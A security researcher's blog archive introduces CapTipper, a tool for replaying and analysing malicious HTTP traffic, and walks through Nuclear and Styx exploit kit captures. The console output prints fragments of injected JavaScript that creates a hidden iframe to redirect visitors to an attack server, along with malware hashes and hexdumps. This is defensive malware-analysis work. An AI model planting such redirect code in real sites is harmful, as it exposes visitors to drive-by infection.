Saturday, March 26, 2016

Too Much Freedom is Dangerous: Understanding IE 11 CVE-2015-2419 Exploitation

It’s been a while since a pure JavaScript vulnerability was widely used by exploit kits. The last few years mostly gave us IE Use-After-Free vulnerabilities. When those were dealt with by Microsoft’s IsolatedHeap and MemoryProtection mechanisms, introduced in the middle of 2014, the stage was clear for Flash to take over.
Now, as Flash is marching towards its imminent death, Silverlight has been dying for a long time, and Java applets must be signed and played only after the user is prompted, we can expect some new trend to arrive on the scene.
CVE-2015-2419 (Jscript9 Memory Corruption), the subject of our paper, was patched a few months ago, but is still used across most Exploit Kits. However, no satisfying analysis, regarding either its root cause or how to successfully exploit it, has been published. We think an analysis of this kind is needed: First, to see a pure JS exploit for IE 11, despite the heap corruption mitigations in IE mentioned above. Second, unless Microsoft comes up with similar protections for IE’s JS engine, this might be the kickoff for similar exploits as soon as Flash disappears.
We started with a working exploit taken from Rig EK (MD5: 4497f09502758ae82f122b21b17d3644. It looks exactly the same as in Angler EK). It’s heavily obfuscated and tricky, which makes the job of understanding the vulnerability, and the exploit directly from the exploit code, very complicated.

Tuesday, August 4, 2015

CapTipper v0.3 is out!

The new version of CapTipper is here and it includes new and exciting features.
The most important addition being CapTippers new logo :)

Thanks to Ira Suris Gurevich for this beautiful work.

I will be presenting the new CapTipper at BlackHat Arsenal USA this week so stop by and say Hi if you're around.

Another project we are presenting at BlackHat Arsenal is the CuckooSploit, a joint effort of our entire team at Check Point. Will elaborate on this later.

It is strongly advised to read the first and second version update blog posts in order to have a better understanding of what CapTipper is all about.

I am trying to answer as many requests I can regarding new features to include in CapTipper, the most common one being a plugins infrastructure.
So here it is.


CapTipper now supports python written plugins that implement the `ConsolePlugin` interface.
All plugins should be placed in the "/plugins/" folder and implement the 'run()' function, which is the entry point CapTipper uses.

Hello World example ("")
from CTPlugin import ConsolePlugin

class my_first_plugin(ConsolePlugin):

    author = "Omri Herscovici"
    description = "Prints Hello World"

    def run(self, args):
        print "Hello World"
Obviously, the plugin interface has access to all the conversations and hosts datasets.

An extensive explanation and examples on how to write a plugin for CapTipper can be found here.

The main repository of CapTipper already includes some plugins for example and if you have an idea for a plugin, do implement it and send it to me or make a PULL request so I can add it to the repository in order to share new functionalities between CapTipper users.

The command 'plugin' enables the use of all loaded plugins.

CT> help plugin
Launching an external plugin (alias: p)

usage: plugin [-l] <*args>
    -l - List all available plugins

    plugin find_scripts
    plugin 1
    p find_scripts

List all available plugins:

CT> plugin -l
Loaded Plugins (3):
 0 : check_host - Checks if a given id's host is alive
 1 : find_scripts - Finds external scripts included in the object body
 2 : print_body - Prints the body of a conversation and ungzip if needed

The plugin command can be also used by its alias 'p'.
Each plugin is assigned with a unique ID, so the use of a plugin can be done either by its name or by its ID.

For example, we can use the 'check_host' plugin who has the id '0' assigned to it.
This plugin receives a conversation id as an argument and checks if the domain hosting that conversation URL is alive.
Let’s use the plugin with conversation '12':

CT> p 0 12
Checking host
[-] Server is dead


Not really a feature but definitely a useful addition to CapTipper.
The CapTipper documentation is comprehensive and details all different aspects of CapTipper.

The documentation is hosted on ReadTheDocs and can be found here

Output log

The output log is a new feature that enables recording all commands and results from the CapTipper console.

CT> output /Users/omriher/Temp/Nuclear-110615.txt
Logging to /Users/omriher/Temp/Nuclear-110615.txt

The logging only includes data from after using the 'output' command.
In order to stop logging, use 'stop' as the second argument.

CT> output stop
Stopped logging to /Users/omriher/Temp/Nuclear-110615.txt

Cuckoo PCAP analysis package

Cuckoo Sandbox is a malware analysis framework used to automatically run and analyse malicious files.
CuckooSploit is the second project we are presenting at BlackHat Arsenal, based on Cuckoo Sandbox .
CuckooSploit is an environment for comprehensive, automated analysis of web-based exploits.

By using full web emulation on different combinations of OS/browser/plugin version, CuckooSploit increases the rate of malicious URL detection and presents a reliable verdict, and in some cases, CVE detection.

Originally CuckooSploit accepted URLs, and now thanks to CapTipper, also accepts PCAP files.
The CuckooSploit integrates CapTipper into it in the form of a new Analysis Package.

The analysis package enables Cuckoo to accept PCAP files for analysis, and use CapTipper to revive them, which enables Cuckoo to produce a full flow report on what exactly happened to the machine (including the payload behavior) when infected by a malicious URL.

The analysis package will work on any Cuckoo instance, and can be found here.
CuckooSploit was developed by our team at Check Point, which also includes David Oren, Liran Englender and Ilana Marcus.
CuckooSploit is on GitHub and can be found here. The blog post about CuckooSploit will be added soon to Check Point's blog.

Using Fiddler SAZ files

There is still no support for using SAZ files in CapTipper natively, but it is possible to do so by converting Fiddler SAZ files to PCAP files using the project fiddler2pcap.
It uses the python scapy library and some of its dependencies, so it's best to do the conversion on a linux machine.
Also, layer 2 and 3 of the packets aren't created well using fiddler2pcap but it is easily fixed using tcprewrite.

I added a small bash script that converts all SAZ files in a folder to PCAPs that are readable by CapTipper (Thanks to Yaron Fruchtman).

The script can be found here.

Video Example

I made an analysis example video using CapTipper based to the PCAP files used in the two (first and second) previous blog posts regarding CapTipper.

Some more changes and bug fixes were made and can be viewed in the change log.

As always, feedback is much appreciated.

CapTipper on GitHub

Tuesday, July 21, 2015

Microsoft Word Intruder RTF Sample Analysis

From my company's blog (Check Point Software Technologies):

Check Point researchers obtained a sample of a malicious Word document that was used in an attack attempt against one of our customers. The sample itself is a Rich Text Format (RTF) file with a .DOC extension. Recently, there has been a resurgence of the trend to use malicious macro code inside office documents. However, this wasn’t the case here.

We were dealing with a sample created by the MWI (Microsoft Word Intruder) Exploit Kit.
MWI is a builder of malicious DOC/RTF files and is accompanied by MWISTAT, a statistics panel which tracks the infections.

In this post I present a deep analysis of the sample, its structure, the different exploit used, mitigations bypass techniques and behaviour.

Wednesday, March 25, 2015

CapTipper 0.2 released!

CapTipper v0.2 is out, and it includes many new features.
I'm presenting the new version today at BlackHat Arsenal, you are welcome to come watch if you're around.

A basic principle for CapTipper’s development is to gather as many useful tools and functions for a researcher under its umbrella.
This release introduces quite a few of those, which I hope will help us all save time switching different tools and spend it researching.

If you are not familiar with CapTipper I highly recommend(!) you read the analysis example I presented here,
since I am not going to introduce the main usages, rather just the new features.

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.
CapTipper sets up a web server that acts exactly as the server in the PCAP file,
and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,
and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

Whats New

Command line argument processing

I was asked by quite a few people to add this ability to CapTipper.
These are the currently supported commands:

optional arguments:
  -h, --help                           Show this help message and exit
  -p PORT, --port PORT                 Set web server port
  -d FOLDER PATH, --dump FOLDER PATH   Dump all files and exit
  -s, --server-off                     Disable web server
  -short, --short-url                  Display shortened URI paths
  -r FOLDER PATH, --report FOLDER PATH Create JSON & HTML report
  -g, --ungzip                         Automatically ungzip responses
  -u, --update                         Update CapTipper to newest version

--dump FOLDERPATH Automatically dump all files from the PCAP.
This was mainly made for people using Cuckoo Sandbox that want to fetch the HTML files created along with other new files.

I have taken the liberty to write a basic Cuckoo processing module that dumps all files from the PCAP and outputs to the Cuckoo log if an EXE file was found.
It can be found here: CapTipper Cuckoo processing module

--ungzip Automatically ungzip all objects, no need to manually ungzip each object anymore.
The generated web-server still responds with the original response in case it was gzipped.

--short-url On some cases the URI paths were very long, making the console view a bit more difficult to inspect.
This feature displays the URI paths in a shortened convenient version.

--report FOLDERPATH This is a new and exciting feature for creating HTML & JSON reports.
The command will produce both .html and .json files in a given folder.
I will elaborate more on this in the following section.

--update Update CapTipper to the current version available on GitHub.

HTML & JSON Report

CapTipper now supports producing HTML reports for convenient view and sharing,
and JSON report for post-analysis information gathering by a third party.

An example HTML report of the Nuclear EK PCAP we analyzed in the first post, can be found here: CapTipper HTML Nuclear Report
The HTML report includes full flow details, client information, interesting binary data and more…

The report is expected to expand and include more information along with the development of CapTipper's new abilities.

HTML Report screenshots:

File Type Identification

File Type Identification provides “magic”-like analysis of a file’s content to determine its true payload.

It was very important for me to add this feature, and after spending some time trying to find a file identification library that suits CapTipper's needs (cross-platform, cross-environment, accepts file stream, and does not require too much dependencies), I came up short and decided to write one myself.

It is titled Whatype.
Whatype is an independent file type identification python library.
Check out the GitHub repository here: Whatype.

My initial goal was only to use it as part of CapTipper, so currently it only supports ~50 of the most common and relevant file formats:
Executables, PDF, JAVA, SWF, Silverlight, HTML, ZIP, and more…

The information is displayed both in the `convs’ list and the `info’ command under `MAGIC’:

As I mentioned earlier, I couldn’t find an existing library to suite my needs.
So I would like to use this opportunity to invite the open-source community to contribute to the Whatype project (currently in beta release phase) and help create a broader and more accurate signature base, improve the identification performance and hopefully help serve other developers that encounter the same problem.

PE Info

A basic PE info script.
It's based on the Malware Cookbook PE scanner and displays interesting and suspicious information regarding a binary file.

It also supports using the '-p' argument to identify packers from the PEiD signature database.

CT> peinfo 14
Displaying PE info of object 14 (8.exe) [139264 bytes]:

Size: 139264 bytes
MD5: 67291715c45c4594b8866e90fbf5c7c4
SHA1: a86dcb1d04be68a9f2d2373ee55cbe15fd299452
Date: 0x545A5C51 [Wed Nov 05 17:20:17 2014 UTC]
EP: 0x401314 .text 0/3
CRC: Claimed: 0x24dec, Actual: 0x2621d [SUSPICIOUS]

Resource entries
Name RVA Size Lang Sublang Type

Name VirtAddr VirtSize RawSize Entropy
.text 0x1000 0x1b5d8 0x1c000 6.635876
.data 0x1d000 0x2128 0x1000 0.000000
.rsrc 0x20000 0x3828 0x4000 4.580442

Version info
Translation: 0x0409 0x04b0
InternalName: ProV
FileVersion: 3.07
CompanyName: VSO Software
Comments: All rights reserved
ProductName: Filmf\xf6rderanstalten
ProductVersion: 3.07
OriginalFilename: ProV.exe


The `Find’ command provides regex search (using the Python re library syntax) inside specific/all objects in the PCAP.
This is extremely useful when looking for a string structure, domain, scripts and HTML objects.

To demonstrate, let's take a look at this PCAP file from the Styx Exploit-Kit: 2014-09-28-Styx-EK-traffic.pcap

$ ./ 2014-09-28-Styx-EK-traffic.pcap --ungzip -short
CapTipper v0.2 b08 - Malicious HTTP traffic explorer tool
Copyright 2015 Omri Herscovici <>

[A] Analyzing PCAP: c:\Research\2014-09-28-Styx-EK-traffic.pcap

[+] Traffic Activity Time: Sun, 09/28/14 01:30:59
[+] Conversations Found:

[!] Displaying shortened URI paths

0: / -> text/html (0.html) [10.0 KB] (Magic: HTML)
1: /wp-conten...yPhoto.css -> text/css (prettyPhoto.css) [2.7 KB] (Magic: TEXT)
2: /wp-conten...efault.css -> text/css (default.css) [39.0 B] (Magic: TEXT)
3: /wp-conten.../style.css -> text/css (style.css) [9.9 KB] (Magic: TEXT)
4: /wp-conten...50x150.jpg -> image/jpeg (Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150x150.jpg) [20.5 KB] (Magic: JPG)
5: /wp-conten...50x150.png -> image/png (Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150x150.png) [43.6 KB] (Magic: PNG)
6: /wp-conten...s/feed.png -> image/png (feed.png) [1.4 KB] (Magic: PNG)
7: /wlkzkir.cgi?default -> text/html (wlkzkir.cgi) [301.0 B] (Magic: HTML)
8: /wp-includ...?ver=1.9.2 -> application/javascript (jquery.ui.effect.min.js) [5.0 KB] (Magic: TEXT)
9: /TbCAgWPudohEQ -> text/html (TbCAgWPudohEQ) [0.0 B]
10: /TbCAgWPud...hEQ/e.html -> text/html (e.html) [11.8 KB] (Magic: HTML)
11: /TbCAgWPud...NDDUG.html -> text/html (qtNDDUG.html) [169.0 B] (Magic: HTML)
12: /TbCAgWPud...AnnQG.html -> text/html (ERAnnQG.html) [4.8 KB] (Magic: HTML)
13: /TbCAgWPud...gBQVI.html -> text/html (gzgBQVI.html) [14.1 KB] (Magic: HTML)
14: /TbCAgWPud.../djIhQ.swf -> application/x-shockwave-flash (djIhQ.swf) [5.1 KB] (Magic: SWF)
15: /TbCAgWPud...2.exe&h=33 -> application/x-msdownload (loader2.exe) [170.6 KB] (Magic: EXE)

[+] Started Web Server on http://localhost:80
[+] Listening to requests...

Starting CapTipper Interpreter
Type 'open ' to open address in browser
Type 'hosts' to view traffic flow
Type 'help' for more options

CT> hosts
Found Hosts: (
  ├-- / [0]
  ├-- /wp-content/plugins/complete-gallery-manager/css/prettyPhoto.css [1]
  ├-- /wp-content/themes/wp-clear321/styles/default.css [2]
  ├-- /wp-content/themes/wp-clear321/style.css [3]
  ├-- /wp-content/uploads/Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150x150.jpg [4]
  ├-- /wp-content/uploads/Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150x150.png [5]
  ├-- /wp-content/themes/wp-clear321/images/feed.png [6]
  └-- /wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.9.2 [8] (
  └-- /wlkzkir.cgi?default [7] (
  ├-- /TbCAgWPudohEQ [9]
  ├-- /TbCAgWPudohEQ/e.html [10]
  ├-- /TbCAgWPudohEQ/qtNDDUG.html [11]
  ├-- /TbCAgWPudohEQ/ERAnnQG.html [12]
  ├-- /TbCAgWPudohEQ/gzgBQVI.html [13]
  ├-- /TbCAgWPudohEQ/djIhQ.swf [14]
  └-- /TbCAgWPudohEQ/loader2.exe&h=33 [15]

CT> iframes 0
Searching for iframes in object 0 (0.html)...
No Iframes Found


A redirection is made to, but the 'iframes' commands didn't produce any results. (For the sake of this example, let's still assume an iframe is used).
Now let's launch the PCAP again with auto ungzip, and use the 'find' command to look for the TDS in all files:

CT> find all rabiorik
Searching 'rabiorik' in all objects:

 0.html [0]:
    (777,50587) : t(){create_frame("")

 wlkzkir.cgi [7]:
    (8,256) : 22 (@RELEASE@) Server at Port 80</address></b

Here it is.
So why did the 'iframes' command come up empty? That’s because ‘iframes’ statically parses the HTML objects in the file, and in this case the iframe is created during run-time.

We can see the domain is being sent to a function called create_frame in object 0, let's search for it:

CT> find 0 create_frame
Searching 'create_frame' in object 0 (0.html):

 (777,50213) : xt/javascript'>function create_frame(a){var b=document.getEle
 (777,50566) : true}}function bdsls4t(){create_frame("

So we found the create_frame function decleration, let's take a better look at it, and explore it using the new 'slice' command.


Slice displays a specified range of bytes (substring) from a file.
Following the previous example, we can examine the "create_frame" javascript function by requesting 256 bytes from its starting position.
'slice' accepts the object-id (0), the offset start (50213) and the length (256):

CT> slice 0 50213 256
Displaying 256 of bytes from offset 50213 in object 0 (0.html):

create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');"weqe";"0px";"0px";"0px";c.frameBorder="0";"none";c.setA

I also included support for "EOB" (End Of Block) detection.
This will tell 'slice' to display code until the end of the current block we are looking at,
whether it's a class, a function or a statement (based on braces { }).

The "eob" argument is used instead of the length value, e.g:

CT> slice 0 50213 eob
Displaying 334 of bytes from offset 50213 in object 0 (0.html):

create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');"weqe";"0px";"0px";"0px";c.frameBorder="0";"none";c.setAttribute("frameBorder","0");
document.body.appendChild(c);c.src=a;return true}}

If we want to be able to read the code more conviently, we can use the 'jsbeautify' command.

JS Beautify

JSBeautify (JavaScript Beautify) reformats the code to be more human-readable, very useful for deep inspection.
It accepts a conversation object and create a new one. (The new object can be dumped to the file system):

CT> jsbeautify obj 8
 JavaScript Beautify of object 8 (jquery.ui.effect.min.js) successful!
 New object created: 16

It can also accept the 'slice' command introduced in the previous section.
Lets use this tool on the "create_frame" function in the javascript code, combined with the 'slice' command.

CT> jsbeautify slice 0 50213 512
create_frame(a) {
    var b = document.getElementById('weqe');
    if (typeof(b) != 'undefined' && b != null) {} else {
        var c = document.createElement('iframe'); = "weqe"; = "0px"; = "0px"; = "0px";
        c.frameBorder = "0"; = "none";
        c.setAttribute("frameBorder", "0");
        c.src = a;
        return true
function bdsls4t() {
try {
    if (window.attachEvent) {
        window.attachEvent('onload', bdsls4t)
    } else {
        if (window.onload) {
            var curronload = wi

Now we can easily understand what the "create_frame" function does and how it works.


The 'objects' command will display all of CapTipper's internal objects (automatic and user created), with basic description and references.

ID       - Object ID
CID     - The Conversation ID assosciated with the object
TYPE   - Object type created automatically or by the user (body, ungzip, jsbeautify...)
NAME  - Name of object given by the PCAP or by CapTipper

CT> objects
Displaying Objects:

ID    CID     TYPE        NAME
---- ----- -----------   --------
0   | 0   | body       | 0.html
1   | 1   | body       | prettyPhoto.css
2   | 2   | body       | default.css
3   | 3   | body       | style.css
4   | 4   | body       | Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150x150.jpg
5   | 5   | body       | Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150x150.png
6   | 6   | body       | feed.png
7   | 7   | body       | wlkzkir.cgi
8   | 8   | body       | jquery.ui.effect.min.js
9   | 9   | body       | TbCAgWPudohEQ
10  | 10  | body       | e.html
11  | 11  | body       | qtNDDUG.html
12  | 12  | body       | ERAnnQG.html
13  | 13  | body       | gzgBQVI.html
14  | 14  | body       | djIhQ.swf
15  | 15  | body       | loader2.exe
16  | 0   | ungzip     | ungzip-0.html
17  | 1   | ungzip     | ungzip-prettyPhoto.css
18  | 3   | ungzip     | ungzip-style.css
19  | 8   | ungzip     | ungzip-jquery.ui.effect.min.js
20  | 10  | ungzip     | ungzip-e.html
21  | 11  | ungzip     | ungzip-qtNDDUG.html
22  | 12  | ungzip     | ungzip-ERAnnQG.html
23  | 13  | ungzip     | ungzip-gzgBQVI.html
24  | 19  | jsbeautify | jsbeautify-ungzip-jquery.ui.effect.min.js

More new commands:
strings     - Find strings embedded in binary files.
req          - Display raw request of a given conversation
ungzip all - Ungzip all objects in PCAP
update     - Update CapTipper to current version from GitHub.
clear        - Clear the screen

Some refactoring was also done to the project, in order to ease access and allow better usage of CapTipper as a standalone library (not tested yet).

There are many more features to come, any feedback or suggestions are always welcome and much appreciated.


Monday, January 12, 2015

CapTipper - Malicious HTTP traffic explorer tool

What is CapTipper

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.
CapTipper sets up a web server that acts exactly as the server in the PCAP file,
and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,
and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI's that were sent and responses meta-data.
The user can at this point browse to[URI] and receive the response back to the browser.
In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...

Analysis Example

Usage: ./ <PCAP_file> [web_server_port=80]

Let's analyze the following Nuclear EK drive-by infection PCAP 2014-11-06-Nuclear-EK-traffic.pcap

C:\CapTipper> "C:\NuclearFiles\2014-11-06-Nuclear-EK-traffic.pcap"

CapTipper v0.1 - Malicious HTTP traffic explorer tool
Copyright 2015 Omri Herscovici <>

[A] Analyzing PCAP: C:\NuclearFiles\2014-11-06-Nuclear-EK-traffic.pcap

[+] Traffic Activity Time: Thu, 11/06/14 17:02:35
[+] Conversations Found:

0: / -> text/html (0.html) [5509 B]
1: /wp-includes/js/jquery/jquery.js?ver=1.7.2 -> application/javascript (jquery.js) [39562 B]
2: /seedadmin17.html -> text/html (seedadmin17.html) [354 B]
3: /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [113149 B]
4: /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [350008 B]
5: /images/footer/3000melbourne.png -> image/png (3000melbourne.png) [2965 B]
6: /images/footer/3207portmelbourne.png -> image/png (3207portmelbourne.png) [3092 B]
7: /wp-content/uploads/2012/09/background1.jpg -> image/jpeg (background1.jpg) [33112 B]
8: /00015d76d9b2rr9f/1415286120 -> application/octet-stream (00015d76.swf) [31579 B]
9: /00015d766423rr9f/1415286120 -> application/pdf (XykpdWhZZ2.pdf) [9940 B]
10: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 -> application/octet-stream (5.exe) [139264 B]
11: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 -> application/octet-stream (5.exe) [139264 B]
12: /00015d76rr9f/1415286120/7 -> application/octet-stream (7.exe) [139264 B]
13: /00015d761709rr9f/1415286120 -> application/octet-stream (00015d76.swf) [8064 B]
14: /00015d76rr9f/1415286120/8 -> application/octet-stream (8.exe) [139264 B]

[+] Started Web Server on http://localhost:80
[+] Listening to requests...

CapTipper Interpreter
Type 'open <conversation id>' to open address in browser
Type 'hosts' to view traffic flow
Type 'help' for more options


The Initialization outputs the conversations found between the client and the server in the following format:


ID: An assigned Id to the specific conversation
REQUEST URI: The URI that was sent to the server in the GET request
SERVER RESPONSE TYPE: The content-type returned in the server response header
FILENAME: The filename can be a few things:
                       1) Filename attribute given in the response header
                       2) Derived from the URI
                       3) Assigned by CapTipper if couldn't find any of the above
SIZE IN BYTES: Response body size

After Initalization, 2 things occur:
  1. CapTipper creates a pseudo-web server that behaves like the web server in the pcap
  2. An Interpreter is launched
The interpreter contains internal tools for further investigation of the objects in the pcap.
Opening a URI in the browser is simply by typing 'open' along with the object id

CT> open 0
CT> log
[2015-01-09T18:01:28.878000] : GET / HTTP/1.1
  • None of the commands (Except 'open') actually requires the server to be running.
    You can turn off the server by typing 'server off' or by adding -s when calling CapTipper.
Let's see what can we find out without using the browser.

First, we'll take a bird's-eye view on the traffic by using the command 'hosts'

CT> hosts
Found Hosts:
 ├-- / [0]
 ├-- /wp-includes/js/jquery/jquery.js?ver=1.7.2 [1]
 ├-- /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg [4]
 ├-- /images/footer/3000melbourne.png [5]
 ├-- /images/footer/3207portmelbourne.png [6]
 └-- /wp-content/uploads/2012/09/background1.jpg [7]
 └-- /seedadmin17.html [2]
 ├-- /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html [3]
 ├-- /00015d76d9b2rr9f/1415286120 [8]
 ├-- /00015d766423rr9f/1415286120 [9]
 ├-- /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 [10]
 ├-- /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 [11]
 ├-- /00015d76rr9f/1415286120/7 [12]
 ├-- /00015d761709rr9f/1415286120 [13]
 └-- /00015d76rr9f/1415286120/8 [14]

It seems that is the compromised site.

By crossing this information and the file types we got in the conversations list, it looks like is the infecting host.

Then what is ?

Well, knowing how exploit-kits usually work, this is probably the TDS (Traffic Distribution System) server.
Let's take a closer look.

We can print the header and the body of the page by typing 'head' and 'body':

CT> head 2
Displaying header of object 2 (seedadmin17.html):

HTTP/1.1 302 Found
Server: nginx
Date: Thu, 06 Nov 2014 15:02:38 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Connection: keep-alive
Set-Cookie: ehihm=_YocADE3AAIAAgCvjVtU__.vjVtUQAABAAAAr41bVAA-; expires=Fri, 06-Nov-2015 15:03:11 GMT; path=/;

CT> body 2
Displaying body of object 2 (seedadmin17.html) [256 bytes]:

<title>302 Found</title>
<p>The document has moved <a href="">here</a>.</p>
  • By deafult, the body command returns the first 256 byte, you can change it by typing body 2 1000 - this will print the first 1000 bytes
We see that object 2, returns a 302 redirection to the infecting host.
So our hypothesis was probably true.

Let's get more information on object 2 by typing 'info':

CT> info 2
Info of conversation 2:

 HOST        :
 URI         : /seedadmin17.html
 REFERER     :
 RESULT NUM  : 302 Found
 RESULT TYPE : text/html
 FILE NAME   : seedadmin17.html
 LENGTH      : 354 B

The referrer to that page was of course, but what exactly redirected us?

By looking at the conversations it was probably either the index page or the javascript file.
Let's have a quick peek at the javascript file (object 1)

CT> body 1
Displaying body of object 1 (jquery.js) [256 bytes]:

▼ ♦♥─╜i{#╟ס╢√}~♣X╓t♥═"HJצg♀░→o½%Y▓╡ם║m┘CR║ @a!▒P ╪כ ╬o?≈‼╣TJ≥£≈\g╞jó╢\"#cן╚πg ÷ry≤~5↔O6םµ╦Vπ├ףף h|╛*ך╞½σh≤6_§ם╧ק╖כa╛ש.↨iπ╦┼á▌רl67¥ππ╤z╘^«╞╟ ÷∞°▀F╖כב▐hלכ═╦σ≥zZ4≤╓▌¢|╒Φg├σαv^,6φב=h╧≤═`╥\¶o ←▀↨π╧▐▌4ףf»≤π╢█h%חy{U▄╠≥A╤

Hmm... What's going on? Let's look at the header

CT> head 1
Displaying header of object 1 (jquery.js):

HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Thu, 06 Nov 2014 15:03:41 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Last-Modified: Mon, 10 Feb 2014 12:34:10 GMT
Content-Type: application/javascript
Content-Length: 39562
Cache-Control: public, max-age=604800
Expires: Thu, 13 Nov 2014 15:03:41 GMT

The response is gzipped.
Let's ungzip it:

CT> ungzip 1
 GZIP Decompression of object 1 (jquery.js) successful!
 New object created: 15

Great. a new object was created (15). 
Let's look at it.

CT> body 15
Displaying body of object 15 (ungzip-jquery.js) [256 bytes]:

Copyright (C) 2007 Free Software Foundation, Inc.
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeU

So this is the ungzipped version of the JS file.
Remember, we want to find out what redirected us to the TDS,
Safe to assume it was an iframe, so let's search for iframes in the new object using the command 'iframes'

CT> iframes 15
Searching for iframes in object 15 (ungzip-jquery.js)...
 1 Iframe(s) Found!

 [I] 1 :

There you go, the attacker planted/altered this javascript and made it send the users to the TDS.

Now let's take a look at the files from the infecting server.
typing 'convs' again will display the conversations:

CT> convs
Conversations Found:

0: / -> text/html (0.html) [5509 B]
1: /wp-includes/js/jquery/jquery.js?ver=1.7.2 -> application/javascript (jquery.js) [39562 B]
2: /seedadmin17.html -> text/html (seedadmin17.html) [354 B]
3: /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [113149 B]
4: /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [350008 B]
5: /images/footer/3000melbourne.png -> image/png (3000melbourne.png) [2965 B]
6: /images/footer/3207portmelbourne.png -> image/png (3207portmelbourne.png) [3092 B]
7: /wp-content/uploads/2012/09/background1.jpg -> image/jpeg (background1.jpg) [33112 B]
8: /00015d76d9b2rr9f/1415286120 -> application/octet-stream (00015d76.swf) [31579 B]
9: /00015d766423rr9f/1415286120 -> application/pdf (XykpdWhZZ2.pdf) [9940 B]
10: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 -> application/octet-stream (5.exe) [139264 B]
11: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 -> application/octet-stream (5.exe) [139264 B]
12: /00015d76rr9f/1415286120/7 -> application/octet-stream (7.exe) [139264 B]
13: /00015d761709rr9f/1415286120 -> application/octet-stream (00015d76.swf) [8064 B]
14: /00015d76rr9f/1415286120/8 -> application/octet-stream (8.exe) [139264 B]

So what do we have here...
looks like we have 1 PDF file, 2 SWF files, and 4 EXE files that were probably downloaded by the shellcode.

We can dump all the files to a folder for deeper inspection using the 'dump' function, we can add '-e' to refrain from dumping the EXE files, so we won't accidentally launch them.

CT> dump all c:\NuclearFiles -e
 Object 0 written to c:\NuclearFiles\0-0.html
 Object 1 written to c:\NuclearFiles\1-jquery.js
 Object 2 written to c:\NuclearFiles\2-seedadmin17.html
 Object 3 written to c:\NuclearFiles\3-15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html
 Object 4 written to c:\NuclearFiles\4-MetroWest_COVER_Issue2_Feb2014.jpg
 Object 5 written to c:\NuclearFiles\5-3000melbourne.png
 Object 6 written to c:\NuclearFiles\6-3207portmelbourne.png
 Object 7 written to c:\NuclearFiles\7-background1.jpg
 Object 8 written to c:\NuclearFiles\8-00015d76.swf
 Object 9 written to c:\NuclearFiles\9-XykpdWhZZ2.pdf
 Object 13 written to c:\NuclearFiles\13-00015d76.swf
 Object 15 written to c:\NuclearFiles\15-ungzip-jquery.js

As you can see, it also dumps the newly created ungzipped javascript file.

We can also examing the files using CapTipper.
Let's take a look at the first SWF file using 'hexdump'.

CT> hexdump 8
Displaying hexdump of object 8 (00015d76.swf) body [256 bytes]:

0000   5A 57 53 17 E4 1B 01 01 4A 7B 00 00 5D 00 00 00    ZWS.....J{..]...
0010   01 00 3B FF FC 8E 19 FA DF E7 66 08 A0 3D 3E 85    ..;.......f..=>.
0020   F5 75 6F D2 74 6B 7F 7F 31 2C 92 04 FD 10 0A EE,......
0030   E2 C5 C2 C9 4C 83 91 74 AE C8 7C 80 F6 31 A6 CE    ....L..t..|..1..
0040   C0 15 CB 62 8D 76 42 8B 28 96 D3 83 FE 20 DE 57    ...b.vB.(.... .W
0050   7B E4 D2 F1 D8 BC E6 45 CF DC 7B 79 38 41 60 1F    {......E..{y8A`.
0060   0A E9 E4 10 8B F8 DA 0D A6 32 CF E1 E6 E9 78 AB    .........2....x.
0070   8B A7 8A C5 62 8F 0B 31 84 41 10 75 B1 33 35 9D    ....b..1.A.u.35.
0080   6E BA 30 B8 AE EB 78 33 31 67 36 42 01 36 4A A3    n.0...x31g6B.6J.
0090   C8 CB 29 B5 36 6E BF A7 D2 3B 9F 5C 6B A8 4A 9F    ..).6n...;.\k.J.
